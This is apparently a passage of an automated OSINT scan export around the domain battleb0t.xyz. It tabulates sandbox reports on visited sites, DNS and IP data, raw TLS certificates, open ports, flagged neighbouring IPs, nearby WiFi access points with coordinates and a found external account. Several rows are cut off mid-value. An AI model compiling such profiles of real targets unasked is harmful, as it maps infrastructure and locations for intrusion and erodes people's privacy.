"require-2.1.15.min_1_.js" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "main_1_.js" has type "ASCII text"- [targetUID: N/A]\n "UX285OWR" has type "ASCII text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\0CH0OVJV\\UX285OWR]- [targetUID: 00000000-00002624]\n "~DFF8A3E5E5181D3E63.TMP" has type "data"- Location: [%TEMP%\\~DFF8A3E5E5181D3E63.TMP]- [targetUID: 00000000-00001008]\n "deposit-bg_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data little-endian direntries=0] progressive precision 8 1005x274 components 3"- [targetUID: N/A]\n "daftar_1_.png" has type "PNG image data 110 x 44 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "aes-handler_1_.js" has type "UTF-8 Unicode (with BOM) text"- [targetUID: N/A]\n "Q5BD73BH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Q5BD73BH.txt]- [targetUID: 00000000-00002624]\n "_74374BB3-BF3B-11ED-9D36-080027B3A16B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "font-awesome.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "login_1_.png" has type "PNG image data 110 x 44 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "livechat_1_.png" has type "PNG image data 300 x 108 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "analytics_2_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "_73FA66E3-BF3C-11ED-9D36-080027B3A16B_.dat" has type "Composite Document File V2 Document Cannot read short stream"- [targetUID: N/A]\n "slide3_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data little-endian direntries=0] progressive precision 8 772x273 components 3"- [targetUID: N/A]\n "AES-3.1.2_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "menu_1_.png" has type "PNG image data 1005 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"sakong88.cfd" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "jquery.org/license"\n Pattern match: "http://www.w3.org/1999/xhtml"\n Pattern match: "http://schema.org"\n Pattern match: "https://sakong88.cfd/img/assets/image/logo.png"\n Pattern match: "https://stats.g.doubleclick.net/j/collect"\n Pattern match: "https://sakong88.cfd/"\n Pattern match: "https://ampcid.google.com/v1/publisher:getClientId"\n Pattern match: "https://cct.google/taggy/agent.js"\n Pattern match: "http://fontawesome.io"\n Pattern match: "http://fontawesome.io/license"\n Pattern match: "v3.1.2code.google.com/p/crypto-js(c)"\n Pattern match: "http://github.com/jrburke/requirejs"\n Pattern match: "https://100tst.sbs/bdsakong/slide1.jpg"\n Pattern match: "https://100tst.sbs/bdsakong/slide2.jpg"\n Pattern match: "https://100tst.sbs/bdsakong/slide3.jpg"\n Pattern match: "https://rebrand.ly/promobdsakong"\n Pattern match: "https://rebrand.ly/web-liga138"\n Pattern match: "https://api.whatsapp.com/send?phone=85569313520"\n Pattern match: "https://t.me/bdsakong"\n Pattern match: "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"\n Pattern match: "https://i.imgur.com/PVD22l6.png"\n Pattern match: "https://rebrand.ly/altbdsakong"\n Pattern match: "https://www.googletagmanager.com/gtag/js?id=UA-110460148-7"\n Pattern match: "www.livehelpnow.net/lhn/widgets/chatbutton/lhnchatbutton-current.min.js"\n Pattern match: ".2.2001229779.1678449772sakong88.cfd/108879072409631166699103678149231019848*_gidGA1.2.1487777423.1678449772sakong88.cfd/1088174468249631020049103709399231019848*"\n Pattern match: ".2.2001229779.1678449772sakong88.cfd/108879072409631166699103678149231019848*_gidGA1.2.1487777423.1678449772sakong88.cfd/1088174468249631020049103709399231019848*_gat_gtag_UA_110460148_71sakong88.cfd/1088163310899231019848103725024231019848*"\n Pattern match: ".2.2001229779.1678449772sakong88.cfd/108879072409631166699103678149231019848*_gidGA1.2.1487777423.1678449772sakong88.cfd/1088174468249631020049103709399231019848*langidsakong88.cfd/1088307940019231093273106244555531019848*"\n Pattern match: "https://www.google.com/ads/ga-audiences,a.google,c"\n Pattern match: "https://stats.g.doubleclick.net/j/collect,ca.U,ca"\n Pattern match: "https://www.google-analytics.com/analytics.js,k=c.F?op(R(c,gaFunctionName)):op();if(pa(k)){var"\n Pattern match: "https | 185.199.109.153 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/jonas.PNG | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:46:49 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | cloudwaysapps.com | 64.226.81.43 |
| 2023-05-12 02:53:06 | Raw Data from RIRs | No | Hybrid Analysis | 4 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://cndglobelogistics.com/index.php/about', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f2c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f2c_IESQMMUTEX_0_331"\n "IsoScope_f2c_IESQMMUTEX_0_519"\n "IsoScope_f2c_IE_EarlyTabStart_0x948_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_f2c_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3884"\n "IsoScope_f2c_ConnHashTable<3884>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3884"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"31.220.3.218:443"\n "104.21.89.62:443"\n "172.64.133.15:443"\n "142.250.189.170:443"\n "104.17.24.14:443"\n "151.101.1.229:443"\n "142.250.191.46:443"\n "69.16.175.10:443"\n "185.199.109.153:443"\n "142.250.188.3:443"\n "142.250.191.67:443"\n "142.251.46.170:443"\n "104.22.24.131:443"\n "52.155.62.95:443"\n "172.67.38.66:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.jsdelivr.net"\n "cdn.lineicons.com"\n "cdnjs.cloudflare.com"\n "cndglobelogistics.com"\n "code.jquery.com"\n "embed.tawk.to"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "parsleyjs.org"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "translate.google.com"\n "translate.googleapis.com"\n "use.fontawesome.com"\n "va.tawk.to"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="col-lg-auto col-4 my-3"><img src="/images/clients/youtube.png" alt="YouTube Thumb" /></div>" (Indicator: "dir "; File: "about_2_.htm")\n Found string "* Copyright 2011-2019 Twitter, Inc." (Indicator: "dir "; File: "style-a984db922da29019ca5adc1e5082e607_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar642D.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-373', u'name': u'Contains ability to send data (Powershell command string)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "Out-Default"; File: "about_2_.htm")\n Found string "<body class="site astroid-framework com-jdbuilder view-page layout-default itemid-105 article-padding-none about tp-style-12 ltr en-GB">" (Indicator: "Out-Default"; File: "about_2_.htm")\n file/memory contains long string with (Indicator: "Out-Default"; File: "urlref_httpscndglobelogistics.comindex.phpabout")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"iStock_000039291924_Medium_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 progressive precision 8 1934x993 components 3" and extension "jpg"\n "cnclogistics-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 Exif Standard: [TIFF image data big-endian direntries=4] baseline precision 8 693x555 components 4" and extension "jpg"\n "business-man_1_.png" has type "PNG image data 475 x 665 8-bit/color RGBA non-interlaced" and extension "png"\n "NickCusworth_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 Exif Standard: [TIFF image data big-endian direntries=21 manufacturer=Canon model=Canon EOS 5D Mark III orientation=upper-left software=Microsoft Windows Photo Viewer 6.1.7600.16385 datetime=2013:11:04 12:20:51] baseline precision 8 148x197 components 3" and extension "jpg"\n "16_1_.png" has type "PNG image data 716 x 1016 8-bit/color RGBA non-interlaced" and extension "png"\n "joomla_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "evernote_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "adobe_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "youtube_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "googledrive_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "cisco_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "arrow_down_1_.png" has type "PNG image data 5 x 3 8-bit/color RGBA non-interlaced" and extension "png"\n "switcher_1_.png" has type "PNG image data 10 x 19 8-bit/color RGBA non-interlaced" and extension "png"\n "blank_1_.png" has type "PNG image data 1 x 1 1-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab641D.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab641D.tmp]- [targetUID: 00000000-00001016]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df2c8ce3db8adea7b0.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{1e3592f3-ee3f-11ed-905e-080027ef242f}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df5204982cf225e3cc.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{1e3592f5-ee3f-11ed-905e-080027ef242f}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{1e3592f3-ee3f-11ed-905e-080027ef242f}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df2c8ce3db8adea7b0.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "style-a984db922da29019ca5adc1e5082e607_1_.css" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "iStock_000039291924_Medium_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 progressive precision 8 1934x993 components 3"- [targetUID: N/A]\n "cnclogistics-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 Exif Standard: [TIFF image data big-endian direntries=4] baseline precision 8 693x555 components 4"- [targetUID: N/A]\n "business-man_1_.png" has type "PNG image data 475 x 66 | 185.199.109.153 |
| 2023-05-12 02:54:17 | Physical Location | No | Censys | 0 | 0 | 4 | 0 | None | San Francisco, California, 94107, United States, North America | 2606:4700:3037::6815:470e |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.156): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:29:AC:D1:54) | 32.8608, -79.9746 |
| 2023-05-12 02:54:00 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 13335 | 104.21.6.166 |
| 2023-05-12 02:55:21 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 14061 | 207.154.228.169 |
| 2023-05-12 02:44:24 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:29:bb:71:26:4f:a3:73:c9:d3:c4:af:c8:b3:a3:33:dc:41
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Jan 23 21:31:46 2023 GMT
Not After : Apr 23 21:31:45 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:d7:c6:91:a2:7d:90:36:47:61:e7:f4:42:67:85:
67:bc:f6:01:51:cb:59:02:c5:69:c6:fb:5b:1b:b9:
c9:4a:2c:0e:df:23:05:55:0f:d4:97:b3:0f:c2:a8:
12:d7:19:fa:98:f0:06:8c:43:18:24:de:aa:3e:e6:
c7:25:79:67:99
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
37:BE:E1:FB:AE:23:1C:29:A5:8A:8C:D8:43:D1:35:F5:04:D1:88:E3
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: ecdsa-with-SHA384
30:65:02:30:7d:70:13:0d:8c:86:f5:d2:71:80:52:b0:81:9f:
d1:36:dd:fc:cb:3b:22:94:33:e2:be:58:b6:3f:ed:5d:35:71:
fe:92:a5:53:e0:f1:36:f0:a2:e7:eb:a2:ad:86:80:be:02:31:
00:b4:75:e4:7e:fc:a0:b6:34:ee:54:89:8a:b5:86:bf:2b:19:
a0:d9:77:ee:64:10:e8:70:df:08:20:8e:21:54:dc:0c:9d:83:
c5:fb:9a:5e:61:df:01:60:14:be:f2:93:65
| battleb0t.xyz |
| 2023-05-12 03:08:52 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.133 | 34.148.97.127 |
| 2023-05-12 02:47:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 185.199.109.153:80 | 185.199.109.153 |
| 2023-05-12 02:53:42 | Netblock Membership | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.109.0/24 | 185.199.109.153 |
| 2023-05-12 02:45:14 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'2606:4700:3031::6815:6a6', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'2606:4700:3030::/46', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv6', u'latitude': 43.6547, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5A', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3623, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:00:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.49): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:23 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.109.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | aysegul (Net ID: 00:1A:2A:02:80:43) | 40.2024, 29.0398 |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5e4de1db49291f-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.6.166 |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.87): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.29): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:45:53 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 4 | 0 | None | 37.751, -97.822 | 2606:4700:3037::6815:470e |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 6562 7451 (Net ID: 00:00:C5:D7:2F:EC) | 37.780462,-122.390564 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000hen.github.io | 185.199.111.153 |
| 2023-05-12 02:44:28 | Affiliate - Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | frabjous-lebkuchen-324004.netlify.app | pics.battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | infoworld (Net ID: 00:02:2D:04:D1:DB) | 37.780462,-122.390564 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Moneysavingexpert (Category: finance)
https://forums.moneysavingexpert.com/profile/login | login |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:2086 | 172.67.168.252 |
| 2023-05-12 02:45:34 | Name Server (DNS NS Records) | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | daphne.ns.cloudflare.com | battleb0t.xyz |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 2 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-proxy-cache: MISS | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} |
| 2023-05-12 03:03:41 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 010916hao.github.io |
| 2023-05-12 02:49:43 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:56:b0:2c:f1:37:ec:4d:fb:ba:29:5b:fe:cf:08:f7:c5:d3
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:49:55 2023 GMT
Not After : Apr 27 17:49:54 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:cb:71:f4:b8:7c:a4:30:09:1b:13:75:c6:c3:49:
0a:5a:97:35:c2:e3:b5:90:5b:a3:b9:e0:c8:a4:e3:
37:7a:a6:7e:1b:38:a5:5a:63:ab:b5:eb:db:f5:ce:
46:28:9a:bb:61:30:d2:f6:61:59:c2:0e:37:b3:85:
32:eb:67:93:5c:a2:8a:68:ae:c7:6a:b0:d0:9f:fc:
8d:d5:3b:0a:5d:17:21:49:98:a5:cc:cd:89:42:87:
4d:54:69:c0:91:34:ff:12:c3:4c:10:fb:89:47:3a:
b3:b5:ed:cc:06:52:eb:16:7a:af:b4:c5:22:00:43:
aa:8d:8b:68:61:04:b5:6e:86:7d:6f:23:6e:79:15:
3b:96:1c:92:ea:d1:76:1a:98:eb:67:69:53:a7:00:
db:63:83:56:0b:fc:db:8c:00:6a:64:27:99:81:0c:
e0:c2:14:78:8e:45:d2:05:23:4b:2e:a1:d6:90:83:
3d:eb:f6:16:04:b9:30:78:89:df:df:c5:c0:a5:c5:
60:dc:2c:82:50:e1:50:fc:88:d4:46:2d:16:9d:dd:
14:56:c3:31:55:0c:b7:cc:40:45:d8:f9:22:11:f9:
ed:60:df:5c:2f:a8:5f:17:ac:ff:7d:8a:1e:77:a6:
e8:15:cb:e0:33:32:29:69:ca:42:d7:15:49:3f:d9:
68:31:ef:59:a1:4e:f5:94:c3:75:47:24:20:25:4f:
22:0f:35:ad:2a:db:20:f0:5d:b9:c7:a2:17:d1:f3:
52:80:77:94:64:66:0d:72:a2:bf:aa:b0:5e:b6:d9:
af:81:4d:54:fa:3e:6b:7d:a8:7b:0d:08:23:70:3b:
37:ad:2b:75:bf:91:06:70:7f:c1:79:93:83:08:8c:
9a:bf:f2:64:ef:2f:39:42:b9:84:35:4b:b0:83:66:
5e:d7:c5:a7:06:f4:b4:89:e9:41:d1:09:1f:c3:66:
18:da:ea:4b:2f:9a:1a:d0:a2:05:8c:af:7f:ec:ae:
0f:17:00:fd:78:c7:64:b6:db:0c:73:e7:03:66:b3:
9e:9f:74:ea:0a:b7:ba:41:3e:89:fa:49:d9:69:26:
3c:0e:bc:77:f5:9f:cd:1d:0b:77:59:ba:57:e5:96:
24:24:9a:52:56:4e:63:31:d7:70:db:dc:4b:70:cb:
90:cd:e2:20:14:b5:fa:25:1b:2d:3b:39:de:26:c5:
3e:2d:95:63:5f:d6:2a:ba:87:f1:7a:9d:cc:8d:4d:
e8:02:34:63:08:c3:8a:65:36:2f:3d:9b:90:77:71:
2a:cc:26:26:c5:ad:9e:d8:4e:fb:7a:b2:ec:5f:c7:
